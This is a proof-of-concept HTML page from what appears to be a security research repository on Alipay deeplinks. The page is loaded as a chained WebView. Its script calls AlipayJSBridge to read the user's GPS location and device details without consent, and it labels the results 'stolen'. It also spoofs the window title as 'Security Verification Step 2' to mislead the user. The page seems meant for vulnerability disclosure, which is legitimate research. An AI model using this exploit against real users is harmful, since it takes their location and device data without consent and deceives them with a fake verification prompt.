icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
af244e8144459fbd5c4f2b431ce4baa24a462de4
alipay-deeplink-research/poc/chain.html

76 lines
2.5 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Chain WebView Demo</title>
<style>
body{font-family:-apple-system,sans-serif;background:#0a0a0f;color:#e0e0e8;padding:16px;font-size:13px}
.hdr{background:rgba(255,68,68,.1);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:12px;margin-bottom:12px}
.hdr h2{color:#ff4444;font-size:15px;margin-bottom:4px}
.hdr p{color:#888;font-size:11px}
.c{background:#12121a;border:1px solid #2a2a3a;border-radius:8px;padding:10px;margin:6px 0}
.ok{color:#44cc88;font-weight:bold}
.r{font-size:10px;color:#777;word-break:break-all;background:#0d1117;padding:6px;border-radius:4px;margin-top:4px;white-space:pre-wrap;font-family:monospace}
</style>
</head><body>
<div class="hdr">
<h2>Chain WebView PoC</h2>
<p>This page was loaded via pushWindow from the parent PoC page.
It demonstrates that chained pages ALSO get full AlipayJSBridge access.</p>
</div>
<div id="log"></div>
<script>
function log(title, data) {
var d = document.createElement('div');
d.className = 'c';
d.innerHTML = '<strong class="ok">[CHAIN]</strong> ' + title + '<div class="r">' + JSON.stringify(data, null, 1) + '</div>';
document.getElementById('log').appendChild(d);
}
function run() {
if (!window.AlipayJSBridge) {
log('ERROR', {msg: 'No AlipayJSBridge in chain page'});
return;
}
log('Chain Bridge Active', {
bridge: true,
url: location.href,
note: 'This chained page has full JSBridge access'
});
AlipayJSBridge.call('getLocation', {}, function(r) {
log('Chain GPS (re-stolen)', {
lat: r.latitude,
lng: r.longitude,
city: r.city,
country: r.country,
note: 'GPS stolen AGAIN from chained page — no additional consent'
});
});
AlipayJSBridge.call('getSystemInfo', {}, function(r) {
log('Chain Device Info (re-stolen)', {
brand: r.brand,
model: r.model,
system: r.system,
version: r.version
});
});
AlipayJSBridge.call('setTitle', {title: 'Security Verification Step 2'});
log('Chain Title Spoofed', {newTitle: 'Security Verification Step 2'});
}
if (window.AlipayJSBridge) { setTimeout(run, 300); }
else { document.addEventListener('AlipayJSBridgeReady', function() { setTimeout(run, 300); }); }
</script>
<p style="text-align:center;margin-top:16px;color:#555;font-size:10px">
Chain WebView demo | <a href="https://innora.ai/zfb/" style="color:#4488ff">Full Report</a>
</p>
</body></html>
Reference in New Issue View Git Blame Copy Permalink